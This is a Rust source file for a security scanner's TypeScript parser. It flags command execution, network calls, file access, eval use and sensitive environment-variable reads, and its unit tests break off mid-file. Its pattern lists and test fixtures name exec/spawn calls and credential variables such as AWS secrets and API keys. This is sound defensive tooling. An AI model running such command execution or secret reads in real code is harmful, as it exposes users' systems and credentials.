Skip to main content

agentshield/parser/
typescript.rs

1use std::collections::HashSet;
2use std::path::{Path, PathBuf};
3
4use once_cell::sync::Lazy;
5use regex::Regex;
6
7use super::{CallSite, FunctionDef, FunctionParam, LanguageParser, ParsedFile};
8use crate::analysis::cross_file::is_sanitizer;
9use crate::error::Result;
10use crate::ir::execution_surface::*;
11use crate::ir::{ArgumentSource, Language, SourceLocation};
12
/// Stateless parser for TypeScript sources.
///
/// Implements [`LanguageParser`] twice in this file: a tree-sitter based
/// implementation when the `typescript` feature is enabled, and a regex
/// based fallback when it is not.
pub struct TypeScriptParser;
14
// ── Dangerous patterns ───────────────────────────────────────────
16
17static EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
18    vec![
19        "exec",
20        "execSync",
21        "execFile",
22        "execFileSync",
23        "spawn",
24        "spawnSync",
25        "child_process.exec",
26        "child_process.execSync",
27        "child_process.execFile",
28        "child_process.execFileSync",
29        "child_process.spawn",
30        "child_process.spawnSync",
31        "cp.exec",
32        "cp.execSync",
33        "cp.spawn",
34        "cp.spawnSync",
35        "shelljs.exec",
36        "execa",
37        "execaSync",
38    ]
39});
40
41static NETWORK_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
42    vec![
43        "fetch",
44        "http.get",
45        "http.request",
46        "https.get",
47        "https.request",
48        "axios",
49        "axios.get",
50        "axios.post",
51        "axios.put",
52        "axios.patch",
53        "axios.delete",
54        "axios.request",
55        "got",
56        "got.get",
57        "got.post",
58        "got.put",
59        "got.patch",
60        "got.delete",
61        "request",
62        "request.get",
63        "request.post",
64        "superagent.get",
65        "superagent.post",
66        "undici.fetch",
67        "undici.request",
68    ]
69});
70
71static FILE_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
72    vec![
73        "readFile",
74        "readFileSync",
75        "writeFile",
76        "writeFileSync",
77        "appendFile",
78        "appendFileSync",
79        "unlink",
80        "unlinkSync",
81        "readdir",
82        "readdirSync",
83        "fs.readFile",
84        "fs.readFileSync",
85        "fs.writeFile",
86        "fs.writeFileSync",
87        "fs.appendFile",
88        "fs.appendFileSync",
89        "fs.unlink",
90        "fs.unlinkSync",
91        "fs.readdir",
92        "fs.readdirSync",
93        "fs.promises.readFile",
94        "fs.promises.writeFile",
95        "fs.promises.unlink",
96        "fs.promises.readdir",
97        "Deno.readTextFile",
98        "Deno.writeTextFile",
99        "Deno.readFile",
100        "Deno.writeFile",
101        "Bun.file",
102    ]
103});
104
105static DYNAMIC_EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
106    vec![
107        "eval",
108        "Function",
109        "vm.runInThisContext",
110        "vm.runInNewContext",
111    ]
112});
113
114static SENSITIVE_ENV_VARS: Lazy<Regex> = Lazy::new(|| {
115    Regex::new(r"(?i)(AWS_|SECRET|TOKEN|PASSWORD|API_KEY|PRIVATE_KEY|CREDENTIALS|AUTH)").unwrap()
116});
117
118// Template literal with interpolation: `...${expr}...`
119static TEMPLATE_LITERAL_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"\$\{[^}]+\}").unwrap());
120
121// Sanitizer assignment: const validPath = await validatePath(x)
122// Captures: (1) variable name, (2) function name (possibly dotted)
123static SANITIZER_ASSIGN_RE: Lazy<Regex> = Lazy::new(|| {
124    Regex::new(r"(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(\w+(?:\.\w+)*)\s*\(").unwrap()
125});
126
// ── tree-sitter AST parser ──────────────────────────────────────
128
/// tree-sitter backed implementation, compiled when the `typescript` feature
/// is enabled.
#[cfg(feature = "typescript")]
impl LanguageParser for TypeScriptParser {
    /// Language tag reported for files handled by this parser.
    fn language(&self) -> Language {
        Language::TypeScript
    }

    /// Parse `content` (the text of `path`) into a [`ParsedFile`].
    ///
    /// Files with a `tsx` or `jsx` extension use the TSX grammar; everything
    /// else uses the plain TypeScript grammar.
    ///
    /// # Errors
    /// Returns `ShieldError::Parse` if the grammar cannot be loaded or if
    /// tree-sitter produces no tree.
    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
        // Both failure modes below report the same file with a different message.
        let parse_error = |message: String| crate::error::ShieldError::Parse {
            file: path.display().to_string(),
            message,
        };

        let grammar = match path.extension() {
            Some(ext) if ext == "tsx" || ext == "jsx" => tree_sitter_typescript::LANGUAGE_TSX,
            _ => tree_sitter_typescript::LANGUAGE_TYPESCRIPT,
        };

        let mut ts_parser = tree_sitter::Parser::new();
        ts_parser
            .set_language(&grammar.into())
            .map_err(|e| parse_error(format!("Failed to load TypeScript grammar: {e}")))?;

        let tree = ts_parser
            .parse(content, None)
            .ok_or_else(|| parse_error("tree-sitter failed to parse TypeScript".into()))?;

        let root = tree.root_node();
        let bytes = content.as_bytes();
        let file_path = path.to_path_buf();
        let mut parsed = ParsedFile::default();
        let mut param_names = HashSet::new();

        // Phase 0: sanitizer assignments, found by regex over the raw text.
        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);

        // Phase 1: function parameters and function definitions.
        collect_params(root, bytes, &file_path, &mut param_names, &mut parsed);

        // Phase 2: call expressions, call sites and env accesses.
        walk_node(root, bytes, &file_path, &param_names, &mut parsed);

        Ok(parsed)
    }
}
190
/// Depth-first pass that records parameters and definitions of every
/// function-like node (declarations, expressions, arrows, methods).
///
/// For each parameter name other than `this`, the name is added to
/// `param_names` and a `FunctionParam` is pushed onto `parsed`. A `FunctionDef`
/// is pushed only when a name could be resolved for the function.
#[cfg(feature = "typescript")]
fn collect_params(
    node: tree_sitter::Node,
    source: &[u8],
    file_path: &Path,
    param_names: &mut HashSet<String>,
    parsed: &mut ParsedFile,
) {
    let is_function_like = matches!(
        node.kind(),
        "function_declaration"
            | "function"
            | "arrow_function"
            | "method_definition"
            | "function_expression"
    );

    if is_function_like {
        // Anonymous functions get an empty name; their params are still recorded.
        let func_name = extract_function_name(node, source).unwrap_or_default();
        let mut declared = Vec::new();

        if let Some(params_node) = node.child_by_field_name("parameters") {
            let param_nodes =
                (0..params_node.named_child_count()).filter_map(|idx| params_node.named_child(idx));
            for param in param_nodes {
                let names = extract_param_names(param, source)
                    .into_iter()
                    .filter(|name| name != "this");
                for name in names {
                    param_names.insert(name.clone());
                    declared.push(name.clone());
                    parsed.function_params.push(FunctionParam {
                        function_name: func_name.clone(),
                        param_name: name,
                        location: loc(file_path, param),
                    });
                }
            }
        }

        if !func_name.is_empty() {
            let is_exported = is_exported_node(node, source);
            parsed.function_defs.push(FunctionDef {
                name: func_name,
                params: declared,
                is_exported,
                location: loc(file_path, node),
            });
        }
    }

    // Nested functions are handled by descending into every named child.
    (0..node.named_child_count())
        .filter_map(|idx| node.named_child(idx))
        .for_each(|child| collect_params(child, source, file_path, param_names, parsed));
}
249
/// Decide whether a function-like node should be treated as exported.
///
/// Returns `true` when an `export_statement` is found among the ancestors
/// before reaching a `program` or `statement_block`, or when the text of the
/// node's immediate parent contains `module.exports` or `exports.`
/// (e.g. `module.exports.func = function(...) {}`).
#[cfg(feature = "typescript")]
fn is_exported_node(node: tree_sitter::Node, source: &[u8]) -> bool {
    // ES module style: climb until an export wrapper or a scope boundary.
    let mut ancestor = node.parent();
    while let Some(current) = ancestor {
        match current.kind() {
            "export_statement" => return true,
            "program" | "statement_block" => break,
            _ => ancestor = current.parent(),
        }
    }

    // CommonJS style: textual check on the direct parent only.
    node.parent().is_some_and(|parent| {
        let text = node_text(parent, source);
        text.contains("module.exports") || text.contains("exports.")
    })
}
276
/// Resolve the name of a function-like node, if it has one.
///
/// Uses the node's own `name` field when present. Otherwise, for an arrow
/// function or function expression that is the direct child of a
/// `variable_declarator` (`const handler = async (params) => { ... }`), the
/// declarator's name is used. Returns `None` in every other case.
#[cfg(feature = "typescript")]
fn extract_function_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    if let Some(own_name) = node.child_by_field_name("name") {
        return Some(node_text(own_name, source).to_string());
    }

    if !matches!(node.kind(), "arrow_function" | "function_expression") {
        return None;
    }

    let declarator = node
        .parent()
        .filter(|parent| parent.kind() == "variable_declarator")?;
    declarator
        .child_by_field_name("name")
        .map(|bound_name| node_text(bound_name, source).to_string())
}
299
/// Collect the binding name(s) introduced by one child of a parameter list.
///
/// A `Vec` is returned because a destructured parameter introduces several
/// names. Unsupported node kinds yield an empty vector.
#[cfg(feature = "typescript")]
fn extract_param_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    match node.kind() {
        // Typed parameters carry the binding in their `pattern` field.
        "required_parameter" | "optional_parameter" => {
            let Some(pattern) = node.child_by_field_name("pattern") else {
                return Vec::new();
            };
            match pattern.kind() {
                "identifier" => vec![node_text(pattern, source).to_string()],
                // { url, name } => ["url", "name"]
                "object_pattern" => extract_object_pattern_names(pattern, source),
                // [a, b] => ["a", "b"]
                "array_pattern" => extract_array_pattern_names(pattern, source),
                _ => Vec::new(),
            }
        }
        // ...args: the first identifier child is the binding.
        "rest_pattern" => (0..node.named_child_count())
            .filter_map(|idx| node.named_child(idx))
            .find(|child| child.kind() == "identifier")
            .map(|child| vec![node_text(child, source).to_string()])
            .unwrap_or_default(),
        // Untyped, JS-style parameter.
        "identifier" => vec![node_text(node, source).to_string()],
        _ => Vec::new(),
    }
}
338
/// Collect the local binding names of an object destructuring pattern.
///
/// `{ url }` contributes `url`; `{ url: myUrl }` contributes `myUrl` (only
/// when the value is a plain identifier). Other child kinds are ignored.
#[cfg(feature = "typescript")]
fn extract_object_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    (0..node.named_child_count())
        .filter_map(|idx| node.named_child(idx))
        .filter_map(|entry| match entry.kind() {
            "shorthand_property_identifier_pattern" => Some(entry),
            "pair_pattern" => entry
                .child_by_field_name("value")
                .filter(|value| value.kind() == "identifier"),
            _ => None,
        })
        .map(|binding| node_text(binding, source).to_string())
        .collect()
}
364
/// Collect the identifier elements of an array destructuring pattern,
/// e.g. `[a, b]` => `["a", "b"]`. Non-identifier elements are skipped.
#[cfg(feature = "typescript")]
fn extract_array_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    (0..node.named_child_count())
        .filter_map(|idx| node.named_child(idx))
        .filter(|element| element.kind() == "identifier")
        .map(|element| node_text(element, source).to_string())
        .collect()
}
378
/// Map a resolved callee name to the HTTP verb implied by its final segment.
///
/// Only the last dot-separated segment is inspected, so an object name that
/// merely contains a verb (`budget.post`, `widget.request`) cannot be
/// mistaken for a `GET`.
#[cfg(feature = "typescript")]
fn http_method_for(func_name: &str) -> Option<&'static str> {
    match func_name.rsplit('.').next().unwrap_or(func_name) {
        "get" => Some("GET"),
        "post" => Some("POST"),
        "put" => Some("PUT"),
        "patch" => Some("PATCH"),
        "delete" => Some("DELETE"),
        _ => None,
    }
}

/// Walk the AST and record everything of interest into `parsed`.
///
/// For every node, in pre-order:
/// - `process.env` member/subscript accesses are recorded as `EnvAccess`;
/// - each `call_expression` is recorded as a `CallSite`, and additionally as a
///   command, network, dynamic-exec and/or file operation when its resolved
///   callee name matches the corresponding pattern list.
///
/// `param_names` is the set of known function parameter names, used when
/// classifying call arguments. Detector entries use the first argument only;
/// the `CallSite` keeps the classification of every argument.
#[cfg(feature = "typescript")]
fn walk_node(
    node: tree_sitter::Node,
    source: &[u8],
    file_path: &Path,
    param_names: &HashSet<String>,
    parsed: &mut ParsedFile,
) {
    let kind = node.kind();

    // process.env.VAR or process.env["VAR"]
    if (kind == "member_expression" || kind == "subscript_expression")
        && node_text(node, source).starts_with("process.env")
    {
        if let Some(name) = extract_env_var_name(node, source) {
            let is_sensitive = SENSITIVE_ENV_VARS.is_match(&name);
            parsed.env_accesses.push(EnvAccess {
                var_name: ArgumentSource::Literal(name),
                is_sensitive,
                location: loc(file_path, node),
            });
        }
    }

    if kind == "call_expression" {
        if let Some(func_node) = node.child_by_field_name("function") {
            let func_name = resolve_call_name(func_node, source);

            // Classify every argument for the CallSite; detectors below only
            // look at the first one.
            let args_node = node.child_by_field_name("arguments");
            let all_arg_sources =
                classify_all_arguments(args_node, source, param_names, &parsed.sanitized_vars);
            let arg_source = all_arg_sources
                .first()
                .cloned()
                .unwrap_or(ArgumentSource::Unknown);

            // Call site for cross-file analysis.
            let caller_name = find_enclosing_function(node, source);
            parsed.call_sites.push(CallSite {
                callee: func_name.clone(),
                arguments: all_arg_sources,
                caller: caller_name,
                location: loc(file_path, node),
            });

            // Command execution
            if matches_pattern(&func_name, &EXEC_PATTERNS) {
                parsed.commands.push(CommandInvocation {
                    function: func_name.clone(),
                    command_arg: arg_source.clone(),
                    location: loc(file_path, node),
                });
            }

            // Network operations
            if matches_pattern(&func_name, &NETWORK_PATTERNS) {
                let args_text = args_node.map(|a| node_text(a, source)).unwrap_or("");
                let verb = http_method_for(&func_name);
                // A body-carrying verb, or an options object that names a payload.
                let sends_data = matches!(verb, Some("POST" | "PUT" | "PATCH"))
                    || args_text.contains("body:")
                    || args_text.contains("data:");
                parsed.network_operations.push(NetworkOperation {
                    function: func_name.clone(),
                    url_arg: arg_source.clone(),
                    method: verb.map(Into::into),
                    sends_data,
                    location: loc(file_path, node),
                });
            }

            // Dynamic execution (exact name match only)
            if DYNAMIC_EXEC_PATTERNS.contains(&func_name.as_str()) {
                parsed.dynamic_exec.push(DynamicExec {
                    function: func_name.clone(),
                    code_arg: arg_source.clone(),
                    location: loc(file_path, node),
                });
            }

            // File operations
            if matches_pattern(&func_name, &FILE_PATTERNS) {
                let op_type = if func_name.contains("write") || func_name.contains("append") {
                    FileOpType::Write
                } else if func_name.contains("unlink") {
                    FileOpType::Delete
                } else if func_name.contains("readdir") {
                    FileOpType::List
                } else {
                    FileOpType::Read
                };
                parsed.file_operations.push(FileOperation {
                    operation: op_type,
                    path_arg: arg_source,
                    location: loc(file_path, node),
                });
            }
        }
    }

    // Every named child is visited, including the children of nodes handled above.
    for i in 0..node.named_child_count() {
        if let Some(child) = node.named_child(i) {
            walk_node(child, source, file_path, param_names, parsed);
        }
    }
}
505
/// Classify each named child of a call's `arguments` node, in order.
///
/// Returns an empty vector when the call has no arguments node.
#[cfg(feature = "typescript")]
fn classify_all_arguments(
    args_node: Option<tree_sitter::Node>,
    source: &[u8],
    param_names: &HashSet<String>,
    sanitized_vars: &HashSet<String>,
) -> Vec<ArgumentSource> {
    match args_node {
        None => Vec::new(),
        Some(args) => (0..args.named_child_count())
            .filter_map(|idx| args.named_child(idx))
            .map(|arg| {
                classify_argument_with_sanitizers(
                    node_text(arg, source),
                    param_names,
                    sanitized_vars,
                )
            })
            .collect(),
    }
}
530
/// Name of the nearest function-like ancestor of `node`, for caller tracking.
///
/// The search stops at the first function-like ancestor: if that function has
/// no resolvable name the result is `None`, and outer functions are not
/// consulted. `None` is also returned when there is no such ancestor.
#[cfg(feature = "typescript")]
fn find_enclosing_function(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    let mut ancestor = node.parent();
    while let Some(scope) = ancestor {
        let is_function_like = matches!(
            scope.kind(),
            "function_declaration"
                | "function"
                | "arrow_function"
                | "method_definition"
                | "function_expression"
        );
        if is_function_like {
            return extract_function_name(scope, source);
        }
        ancestor = scope.parent();
    }
    None
}
549
/// Turn the `function` child of a call expression into a flat callee name.
///
/// Member and optional-chain expressions have spaces and newlines removed so
/// that a chain split across lines still reads `a.b.c`. Every other node kind
/// is returned as its source text unchanged.
#[cfg(feature = "typescript")]
fn resolve_call_name(node: tree_sitter::Node, source: &[u8]) -> String {
    let raw = node_text(node, source);
    if matches!(node.kind(), "member_expression" | "optional_chain_expression") {
        raw.chars().filter(|c| !matches!(c, '\n' | ' ')).collect()
    } else {
        raw.to_string()
    }
}
563
/// Extract the variable name from a direct `process.env` access.
///
/// Handles `process.env.NAME` (member access) and `process.env["NAME"]` /
/// `process.env['NAME']` (subscript access, surrounding quotes stripped).
///
/// Returns `None` unless the access's object is exactly `process.env`. This
/// means a longer chain such as `process.env.NAME.length` yields a name only
/// for its inner `process.env.NAME` node, instead of also producing a bogus
/// `NAME.length` entry for the outer node.
///
/// A non-literal index (`process.env[key]`) is returned as the index
/// expression's source text.
#[cfg(feature = "typescript")]
fn extract_env_var_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    // Both member_expression and subscript_expression expose the receiver
    // through the `object` field.
    let object = node.child_by_field_name("object")?;
    if node_text(object, source) != "process.env" {
        return None;
    }

    let name = match node.kind() {
        "member_expression" => node_text(node.child_by_field_name("property")?, source),
        "subscript_expression" => {
            let index = node.child_by_field_name("index")?;
            node_text(index, source)
                .trim_matches('"')
                .trim_matches('\'')
        }
        _ => return None,
    };

    (!name.is_empty()).then(|| name.to_string())
}
584
/// Source text covered by `node`, or `""` if that byte range is not valid UTF-8.
#[cfg(feature = "typescript")]
fn node_text<'a>(node: tree_sitter::Node, source: &'a [u8]) -> &'a str {
    match node.utf8_text(source) {
        Ok(text) => text,
        Err(_) => "",
    }
}
590
/// Convert a tree-sitter node's span into a `SourceLocation` for `file`.
///
/// Rows are shifted by one so lines are 1-indexed; columns are passed through
/// exactly as tree-sitter reports them.
#[cfg(feature = "typescript")]
fn loc(file: &Path, node: tree_sitter::Node) -> SourceLocation {
    let (first, last) = (node.start_position(), node.end_position());
    SourceLocation {
        file: PathBuf::from(file),
        line: first.row + 1,
        column: first.column,
        end_line: Some(last.row + 1),
        end_column: Some(last.column),
    }
}
604
// ── Shared sanitizer detection ──────────────────────────────────
606
607/// Detect sanitizer assignments in source code and populate sanitized_vars.
608/// Matches patterns like: `const validPath = await validatePath(x)`
609fn detect_sanitizer_assignments(content: &str, sanitized_vars: &mut HashSet<String>) {
610    for cap in SANITIZER_ASSIGN_RE.captures_iter(content) {
611        let var_name = &cap[1];
612        let func_name = &cap[2];
613        if is_sanitizer(func_name) {
614            sanitized_vars.insert(var_name.to_string());
615        }
616    }
617}
618
619/// Classify an argument, considering sanitized variables.
620fn classify_argument_with_sanitizers(
621    arg_text: &str,
622    param_names: &HashSet<String>,
623    sanitized_vars: &HashSet<String>,
624) -> ArgumentSource {
625    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
626
627    if first_arg.is_empty() {
628        return ArgumentSource::Unknown;
629    }
630
631    // Check if this is a sanitized variable (before other checks)
632    let ident = first_arg.split('.').next().unwrap_or(first_arg);
633    let ident = ident.split('[').next().unwrap_or(ident);
634    if sanitized_vars.contains(ident) {
635        return ArgumentSource::Sanitized {
636            sanitizer: ident.to_string(),
637        };
638    }
639
640    // Delegate to existing classification
641    classify_argument_text(first_arg, param_names)
642}
643
// ── Regex fallback parser (when typescript feature is disabled) ──
645
646#[cfg(not(feature = "typescript"))]
647static CALL_RE: Lazy<Regex> =
648    Lazy::new(|| Regex::new(r"(?m)(\w+(?:\.\w+)*)\s*\(([^)]*)\)").unwrap());
649
650#[cfg(not(feature = "typescript"))]
651static ENV_ACCESS_RE: Lazy<Regex> = Lazy::new(|| {
652    Regex::new(r#"(?m)process\.env\s*(?:\[\s*["']([^"']+)["']\s*\]|\.([A-Z_][A-Z0-9_]*))"#).unwrap()
653});
654
655#[cfg(not(feature = "typescript"))]
656static FUNC_DEF_RE: Lazy<Regex> = Lazy::new(|| {
657    Regex::new(
658        r"(?m)(?:(?:export\s+)?(?:async\s+)?function\s+(\w+)\s*\(([^)]*)\)|(?:const|let|var)\s+(\w+)\s*=\s*(?:async\s+)?\(([^)]*)\)\s*(?:=>|:\s*\w+\s*=>)|(\w+)\s*\(([^)]*)\)\s*(?::\s*\w+\s*)?\{)"
659    ).unwrap()
660});
661
662#[cfg(not(feature = "typescript"))]
663static EXPORT_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"^(?:export\s+)").unwrap());
664
665#[cfg(not(feature = "typescript"))]
666impl LanguageParser for TypeScriptParser {
667    fn language(&self) -> Language {
668        Language::TypeScript
669    }
670
671    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
672        let mut parsed = ParsedFile::default();
673        let file_path = PathBuf::from(path);
674        let mut param_names = HashSet::new();
675
676        // Phase 0: Detect sanitizer assignments
677        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
678
679        // Collect function parameter names + FunctionDef entries
680        for cap in FUNC_DEF_RE.captures_iter(content) {
681            let params_str = cap
682                .get(2)
683                .or_else(|| cap.get(4))
684                .or_else(|| cap.get(6))
685                .map(|m| m.as_str())
686                .unwrap_or("");
687            let func_name = cap
688                .get(1)
689                .or_else(|| cap.get(3))
690                .or_else(|| cap.get(5))
691                .map(|m| m.as_str())
692                .unwrap_or("");
693
694            let full_match = cap.get(0).map(|m| m.as_str()).unwrap_or("");
695            let is_exported = full_match.starts_with("export");
696
697            let mut func_params = Vec::new();
698            for param in params_str.split(',') {
699                let param = param.trim();
700                if param.starts_with('{') || param.starts_with('[') {
701                    continue;
702                }
703                let param = param.split(':').next().unwrap_or("").trim();
704                let param = param.split('=').next().unwrap_or("").trim();
705                let param = param.trim_start_matches("...");
706                let param = param.trim_end_matches('?');
707                if !param.is_empty() && param != "this" {
708                    param_names.insert(param.to_string());
709                    func_params.push(param.to_string());
710                    parsed.function_params.push(FunctionParam {
711                        function_name: func_name.to_string(),
712                        param_name: param.to_string(),
713                        location: regex_loc(&file_path, 0),
714                    });
715                }
716            }
717
718            if !func_name.is_empty() {
719                parsed.function_defs.push(FunctionDef {
720                    name: func_name.to_string(),
721                    params: func_params,
722                    is_exported,
723                    location: regex_loc(&file_path, 0),
724                });
725            }
726        }
727
728        // Scan line by line
729        for (line_idx, line) in content.lines().enumerate() {
730            let line_num = line_idx + 1;
731            let trimmed = line.trim();
732
733            if trimmed.starts_with("//") || trimmed.starts_with('*') || trimmed.starts_with("/*") {
734                continue;
735            }
736
737            for cap in ENV_ACCESS_RE.captures_iter(line) {
738                let var_name = cap
739                    .get(1)
740                    .or_else(|| cap.get(2))
741                    .map(|m| m.as_str().to_string())
742                    .unwrap_or_default();
743                let is_sensitive = SENSITIVE_ENV_VARS.is_match(&var_name);
744                parsed.env_accesses.push(EnvAccess {
745                    var_name: ArgumentSource::Literal(var_name),
746                    is_sensitive,
747                    location: regex_loc(&file_path, line_num),
748                });
749            }
750
751            for cap in CALL_RE.captures_iter(line) {
752                let func_name = &cap[1];
753                let args_str = &cap[2];
754                let arg_source = classify_argument_with_sanitizers(
755                    args_str,
756                    &param_names,
757                    &parsed.sanitized_vars,
758                );
759
760                // Record CallSite
761                let all_args = args_str
762                    .split(',')
763                    .map(|a| {
764                        classify_argument_with_sanitizers(
765                            a.trim(),
766                            &param_names,
767                            &parsed.sanitized_vars,
768                        )
769                    })
770                    .collect::<Vec<_>>();
771                parsed.call_sites.push(CallSite {
772                    callee: func_name.to_string(),
773                    arguments: all_args,
774                    caller: None, // Regex path can't easily determine enclosing function
775                    location: regex_loc(&file_path, line_num),
776                });
777
778                if matches_pattern(func_name, &EXEC_PATTERNS) {
779                    parsed.commands.push(CommandInvocation {
780                        function: func_name.to_string(),
781                        command_arg: arg_source.clone(),
782                        location: regex_loc(&file_path, line_num),
783                    });
784                }
785
786                if matches_pattern(func_name, &NETWORK_PATTERNS) {
787                    let sends_data = func_name.contains("post")
788                        || func_name.contains("put")
789                        || func_name.contains("patch")
790                        || args_str.contains("body:")
791                        || args_str.contains("data:");
792                    let method = if func_name.contains("get") {
793                        Some("GET".into())
794                    } else if func_name.contains("post") {
795                        Some("POST".into())
796                    } else if func_name.contains("put") {
797                        Some("PUT".into())
798                    } else {
799                        None
800                    };
801                    parsed.network_operations.push(NetworkOperation {
802                        function: func_name.to_string(),
803                        url_arg: arg_source.clone(),
804                        method,
805                        sends_data,
806                        location: regex_loc(&file_path, line_num),
807                    });
808                }
809
810                if DYNAMIC_EXEC_PATTERNS.contains(&func_name) {
811                    parsed.dynamic_exec.push(DynamicExec {
812                        function: func_name.to_string(),
813                        code_arg: arg_source.clone(),
814                        location: regex_loc(&file_path, line_num),
815                    });
816                }
817
818                if matches_pattern(func_name, &FILE_PATTERNS) {
819                    let op_type = if func_name.contains("write") || func_name.contains("append") {
820                        FileOpType::Write
821                    } else if func_name.contains("unlink") {
822                        FileOpType::Delete
823                    } else if func_name.contains("readdir") {
824                        FileOpType::List
825                    } else {
826                        FileOpType::Read
827                    };
828                    parsed.file_operations.push(FileOperation {
829                        operation: op_type,
830                        path_arg: arg_source.clone(),
831                        location: regex_loc(&file_path, line_num),
832                    });
833                }
834            }
835        }
836
837        Ok(parsed)
838    }
839}
840
841#[cfg(not(feature = "typescript"))]
842fn regex_loc(file: &Path, line: usize) -> SourceLocation {
843    SourceLocation {
844        file: file.to_path_buf(),
845        line,
846        column: 0,
847        end_line: None,
848        end_column: None,
849    }
850}
851
852// ── Shared helpers ──────────────────────────────────────────────
853
/// Report whether `func_name` matches at least one entry of `patterns`.
///
/// A pattern matches when `func_name` ends with it, which covers both the
/// exact name (`exec`) and qualified calls (`fs.readFileSync`). The comparison
/// is a plain case-sensitive suffix test, so `forgot` also matches `got`.
fn matches_pattern(func_name: &str, patterns: &[&str]) -> bool {
    for &candidate in patterns {
        // Equality is the special case of a suffix spanning the whole name.
        if func_name.ends_with(candidate) {
            return true;
        }
    }
    false
}
860
861/// Classify an argument text to determine its source.
862fn classify_argument_text(arg_text: &str, param_names: &HashSet<String>) -> ArgumentSource {
863    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
864
865    if first_arg.is_empty() {
866        return ArgumentSource::Unknown;
867    }
868
869    // String literal (double or single quoted)
870    if (first_arg.starts_with('"') && first_arg.ends_with('"'))
871        || (first_arg.starts_with('\'') && first_arg.ends_with('\''))
872    {
873        if first_arg.len() >= 2 {
874            let val = &first_arg[1..first_arg.len() - 1];
875            return ArgumentSource::Literal(val.to_string());
876        }
877        return ArgumentSource::Literal(String::new());
878    }
879
880    // Template literal with interpolation: `...${var}...`
881    if first_arg.starts_with('`') {
882        if TEMPLATE_LITERAL_RE.is_match(first_arg) {
883            return ArgumentSource::Interpolated;
884        }
885        let val = first_arg.trim_matches('`');
886        return ArgumentSource::Literal(val.to_string());
887    }
888
889    // String concatenation with +
890    if first_arg.contains('+') && (first_arg.contains('"') || first_arg.contains('\'')) {
891        return ArgumentSource::Interpolated;
892    }
893
894    // process.env reference
895    if first_arg.contains("process.env") {
896        return ArgumentSource::EnvVar {
897            name: first_arg.to_string(),
898        };
899    }
900
901    // Known function parameter
902    let ident = first_arg.split('.').next().unwrap_or(first_arg);
903    let ident = ident.split('[').next().unwrap_or(ident);
904    if param_names.contains(ident) {
905        return ArgumentSource::Parameter {
906            name: ident.to_string(),
907        };
908    }
909
910    ArgumentSource::Unknown
911}
912
#[cfg(test)]
mod tests {
    use super::*;

    /// TypeScript fixture shared by the call-site and sanitizer tests.
    const SANITIZED_HANDLER: &str = r#"
async function handler(args: any) {
    const validPath = await validatePath(args.path);
    const content = await readFileContent(validPath);
    return content;
}
"#;

    /// Parse `code` as if it were the file `file_name`, panicking on error.
    #[track_caller]
    fn parse_ts(file_name: &str, code: &str) -> ParsedFile {
        TypeScriptParser
            .parse_file(Path::new(file_name), code)
            .unwrap()
    }

    /// `exec(param)` is recorded as a command fed by a function parameter.
    #[test]
    fn detects_exec_with_param() {
        let parsed = parse_ts(
            "test.ts",
            r#"
import { exec } from "child_process";

function runCommand(command: string) {
    exec(command);
}
"#,
        );
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A template literal with `${...}` is classified as interpolated.
    /// (Despite the test name, the fixture calls `exec`.)
    #[test]
    fn detects_spawn_with_interpolation() {
        let parsed = parse_ts(
            "test.ts",
            r#"
function run(cmd: string) {
    exec(`${cmd} --flag`);
}
"#,
        );
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Interpolated
        ));
    }

    /// `fetch(param)` is recorded as a network operation with a parameter URL.
    #[test]
    fn detects_fetch_with_param() {
        let parsed = parse_ts(
            "test.ts",
            r#"
async function fetchUrl(url: string) {
    const resp = await fetch(url);
    return resp.json();
}
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A hard-coded URL is still recorded, but with a literal URL argument.
    #[test]
    fn safe_literal_url_not_flagged() {
        let parsed = parse_ts(
            "test.ts",
            r#"
async function getHealth() {
    const resp = await fetch("https://api.example.com/health");
    return resp.json();
}
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Literal(_)
        ));
    }

    /// Both bracket and dot access on `process.env` are found and marked sensitive.
    #[test]
    fn detects_env_var_access() {
        let parsed = parse_ts(
            "test.ts",
            r#"
const apiKey = process.env["OPENAI_API_KEY"];
const secret = process.env.AWS_SECRET_ACCESS_KEY;
"#,
        );
        assert_eq!(parsed.env_accesses.len(), 2);
        assert!(parsed.env_accesses[0].is_sensitive);
        assert!(parsed.env_accesses[1].is_sensitive);
    }

    /// `eval(param)` is recorded as dynamic execution of a parameter.
    #[test]
    fn detects_eval() {
        let parsed = parse_ts(
            "test.ts",
            r#"
function execute(code: string) {
    eval(code);
}
"#,
        );
        assert_eq!(parsed.dynamic_exec.len(), 1);
        assert!(matches!(
            parsed.dynamic_exec[0].code_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// `fs.readFileSync(param, ...)` is recorded as a file operation on a parameter path.
    #[test]
    fn detects_file_operations() {
        let parsed = parse_ts(
            "test.ts",
            r#"
import fs from "fs";

function readConfig(path: string) {
    return fs.readFileSync(path, "utf-8");
}
"#,
        );
        assert_eq!(parsed.file_operations.len(), 1);
        assert!(matches!(
            parsed.file_operations[0].path_arg,
